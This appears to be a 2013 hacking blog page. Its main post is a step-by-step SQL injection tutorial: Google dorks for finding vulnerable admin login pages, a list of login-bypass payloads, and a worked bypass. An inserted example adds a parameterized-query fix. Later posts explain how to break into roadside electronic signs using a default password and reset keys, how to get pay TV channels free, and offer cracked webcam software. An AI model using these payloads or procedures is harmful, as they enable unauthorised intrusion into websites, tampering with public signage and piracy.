Sunday, 28 April 2013

Exploiting web applications by SQL injection (step-by-step tutorial)


Hello readers. Today I am sharing how to exploit a web application with a SQL injection attack. In this post I show, step by step, how to bypass an admin login using some queries.





What is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

[Step – 1] Find SQL Injection Vulnerable Website


First we need a site that is vulnerable to the attack. This is the first step in SQL injection exploitation and, as with every other hacking attack, it is the most time-consuming step, and the only time-consuming one.


1) By Google Dork

Google dorks are at the center of Google hacking. Google's database is the biggest, so hackers exploit it by using various search engine commands or complex search queries to locate sensitive data and vulnerable devices on the internet. For example, a Google dork can be used to find random websites that are vulnerable to SQL injection.


There are a large number of Google dorks for basic SQL injection. Here are the best:


inurl:admin.asp

inurl:login/admin.asp

inurl:admin/login.asp

inurl:adminlogin.asp

inurl:adminhome.asp

inurl:admin_login.asp

inurl:administratorlogin.asp

inurl:login/administrator.asp

inurl:administrator_login.asp


2) By Automated Tools

Today many tools are available for finding a vulnerable site. Tools make the work easy and save time. Admin page finding tools scan websites for administrator login pages. They make use of a predefined list for finding the admin login pages. After finding the pages, the tool may present us the page on which we can log in with the administrator password. “Actually, finding an admin page is nothing but finding a directory of a particular website.”
You can use the admin finder script (a Perl script). I shared this script in my previous post, where you can get the script and see the tutorial.

[Step - 2] SQL Injection Queries

Here is a list of some popular SQL injection queries. We can use these to bypass login authentication. These queries confuse the database.


'or''='

admin'--

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 -- 

[Step – 3] Exploiting Web Applications by SQL Injection
After finding the admin page of a vulnerable web application, we can exploit that application using client-supplied SQL queries. This enables the execution of unauthorized SQL commands.

For example, when a user logs on to a webpage using a username and password for validation, a SQL query is used there. However, an attacker can use SQL injection to send specially crafted username and password fields that poison the original SQL query.


Let’s see an example that illustrates this kind of attack so that we can fully understand how it works. We have a SQL-vulnerable website.

You can watch this demo.

We found a SQL injection point for exploitation. In the image below we can see the login page, or user authentication form, of this website.




www.demo.testfire.net has an authentication form for accessing the administration part of its Website. The authentication requires the user to enter a valid username and password. After sending a username and password, the application sends a query to the database to validate the user. 

The query has the following format:



SELECT *
FROM admin
WHERE username = '[USER ENTRY]' AND password = '[USER ENTRY]'




The application doesn’t perform any sanitization of the received data, and therefore we have full control over what we send to the server. The authentication form requests a username and a password from the user. If we enter any random username and password the result page shows an “Invalid username or password” message.

The authentication requires the user to enter a valid username and password. We don’t know a valid username and password, so here we inject some SQL to bypass the login. In the username field we type admin as the username, and in the password field we set 'or''='

The query has the following format:


SELECT *
FROM admin
WHERE username = 'admin' AND password = ''or''=''


 


If the query runs successfully, we bypass the login without knowing the username and password. In the image below we can see that we have bypassed the login and are using the admin panel as an administrator. We can manage the website's contents as we want.
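
The login query above, written both ways, as an added example that is not part of the original post: the concatenated form the post describes and the parameterized form that fixes it. The in-memory SQLite table, the sample password and the function names are assumptions made for the illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: a single admin row in an in-memory database.
    # (Plaintext password only to mirror the query shown in the post.)
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'constructed-secret')")
    return db

def build_concatenated(username, password):
    # The post's query: user input is pasted straight into the SQL text.
    return ("SELECT * FROM admin WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_concatenated(db, username, password):
    # Vulnerable: quotes in the input change the structure of the WHERE clause.
    sql = build_concatenated(username, password)
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # Hardened: placeholders send the input as bound values, so it is only
    # ever compared as a string and never parsed as SQL.
    sql = "SELECT * FROM admin WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    payload = "'or''='"  # password value used in the post
    print(build_concatenated("admin", payload))
    # AND binds tighter than OR, so the clause reads
    #   (username = 'admin' AND password = '') OR ('' = '')
    # and the right-hand side is true for every row in the table.
    print("concatenated :", login_concatenated(db, "admin", payload))
    print("parameterized:", login_parameterized(db, "admin", payload))
    print("real password:", login_parameterized(db, "admin", "constructed-secret"))
```

With bound parameters the same input is just a seven-character password that matches no row, so the login is refused without any filtering or escaping of quotes.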


* In my next post we will discuss blind SQL injection.






Open source admin page finder tool (riddhi)

Today many tools are available for finding admin pages. Tools make the work easy and save time. Admin page finding tools scan websites for administrator login pages. They make use of a predefined list for finding the admin login pages. After finding the pages, the tool may present us the page on which we can log in with the administrator password.


“Actually, finding an admin page is nothing but finding a directory of a particular website.”

Admin Finder Script is an open source script written in Perl. To use this tool we need to install ActivePerl on our machine.


The things you need 

Download ActivePerl


Download the admin finder Perl script


After installing Perl, we use the command prompt to launch the Admin Finder Perl script. To launch it, just go to the directory of our Perl installation and type the name of the script.


Now our script is running. Just fill in the name of the site whose admin page we want to find for further security assessment, and for the page type just type ‘any’ as the language input.

In the image below we can see that it is finding the admin page of the website by matching page names against its pre-built database.




Saturday, 20 April 2013

Hacking Traffic Signals

Road sign hacking means hacking the road signs, which means you can control the signs at the roadside that tell you where the road leads. For example: “the following road leads to Los Angeles, 50 km, blah blah”.

Although this traffic system is not much in practice in India, it is very popular in foreign countries. As I always say, try all of this at your own risk, as it is totally ILLEGAL, so be careful.
Most road signs are manufactured by IMAGO security Solution Company.
1. The access panel on the sign is generally protected by a small lock, but you may often see them left unlocked. Or if they are locked then you can unlock them using a hammer or something like that. Upon opening the access panel you will see some panels holding the display electronics.
2. The black control pad on the display electronics is attached by a curly cord, with a keyboard on the front.
3. This is where the programming comes in. Scroll through the menu selection to “Instant Text”. Type whatever you want displayed on the screen. Hit ENTER to submit. You can now throw it up on the sign by selecting “Run w/out save”, or add more pages by selecting “ADD PAGES”.
Now you must be wondering how easy it is. But it’s not so easy. When you go to change them you are prompted for a password. Guys n gals, that’s the main issue: the PASSWORD.
So the default password there is DOTS.
So go for it and you can change the display, but what if some office personnel have changed it to something else?
Don’t worry, you can reset it to DOTS by following this procedure:

CTRL + SHIFT +DIPY

Using the above will reset the password to DOTS; then do it again using DOTS as the password.

So enjoy all this stuff at your own risk.
HAPPY HACKING . . .   

Airtel Digital TV Satellite Update Hack: Get Free FTA Channels and Out-of-Zone Pay Channels


Airtel has been constantly changing the software that operates the STBs we have in our homes. I don’t know why, but the latest update seems pretty boring, as it has a new, bad and rude main menu. Share if you agree :).
By following the method below you can get FTA channels and channels which are not available in India. If you are that lucky and blessed, you might have a chance of viewing all the Band 2 channels for free. How does that sound? One thing is for sure: you will get some FTA channels on your ADTV.

1. First unplug the adapter of your STB
2. Remove your View Card from the back of the STB
3. Turn on the STB and insert the View Card
4. When the three LEDs on the STB start to blink together, you will get a “Please wait Initializing” message
5. Immediately press the Exit key on your remote two times and enter 2465
6. The STB will start automatic downloading of the new software
7. Wait for this to finish and don’t cut the power. You must update the STB for the proper orientation of the FTA channels
8. After the upgrade the STB will automatically restart
9. Remove your dish cable from the back of the STB
10. Now you will see the installation setup
11. The first satellite will be NES7. Change the second one to “OTHER” under the FTA settings
12. Now try scanning for FTA; always use Quick scan
13. Try changing the symbol rate and frequencies
14. If you get any channel, press save and it can be viewed after channel 999.

Monday, 15 April 2013

WEBCAM 7 PRO WITH SERIAL


Today I want to share a great piece of software. Webcam 7 Pro is powerful webcam and network camera monitoring, recording and streaming software for private and professional use. It offers unique features and unequaled ease of use to let you manage multiple video sources on the same computer. It is the ideal tool to secure your goods and keep an eye on them remotely from your phone or over the internet.

webcam 7 is a brand new product based on webcamXP.
The user interface is the same; however, it offers exciting enhancements such as:
• Flash Video (FLV) audio and video streaming (high frame rate for low bandwidth)
• MJPEG recording with audio support.

webcam 7 Free is the basic product for home users. It lets you stream via HTTP or Windows Media, or upload via FTP/FTPS or HTTP/HTTPS Post. It also lets you add overlays / watermarks over your video streams and has basic features such as capturing or recording at a fixed interval. This version is ideal for putting a live webcam on your web page and is robust for 24/7 broadcasting. Supports a single video source.

Webcam 7 Private is more advanced: besides support for multiple video sources, it also offers the possibility to filter by IP and to smartly manage who can access your video streams. You can limit users' viewing time and don't have to worry about your privacy. Supports up to 5 video sources.

webcam 7 PRO is the most advanced version of the software. It has all the features of the Private version and includes the motion detector (optical and/or acoustic detectors), the advanced alerts manager, the ability to log traffic to files and the digital video recorder (permanent recording). It's the perfect solution for advanced security purposes at low cost. Supports an unlimited number of video sources.

It is now available for beta testing, and you can install it even if webcamXP is already installed. It will use its own settings; the only part in common is the IP Camera DirectShow filter.
If you have a webcamXP license issued less than 2 years ago then you are entitled to use webcam 7 PRO. A free single source mode and the PRO trial mode are also enabled.

supported devices:
- usb webcams (WDM driver required)
- tv, analog or multi-input capture cards (WDM driver required)
- ip cameras (JPEG/MJPEG/MPEG4)
- Windows Media streams (ASF)
- local video files (AVI/WMV/MP4/MOV/...)

supported streaming modes:
- still jpeg images for low-tech devices
- flash client (compatible with most operating systems and handheld devices)
- javascript clients (MJPEG or JPEG PUSH)
- Windows Media streaming

additional key features:
- run as service (new!)
- local and remote pan & tilt control (Logitech Orbit, Creative LiveMotion! and IP cameras).
- supports FTP/FTPS and HTTP/HTTPS Post
- motion detector (optical or acoustic) with many possible ways to handle alerts (local recording, ftp, http post, launch external applications)
- advanced users manager to grant limited or unlimited access.
- overlay editor supporting picture in picture, animated gifs, alpha-blending and text editor.
- DVR (permanent recording deleted after X hours)

 (File size 9.0MB)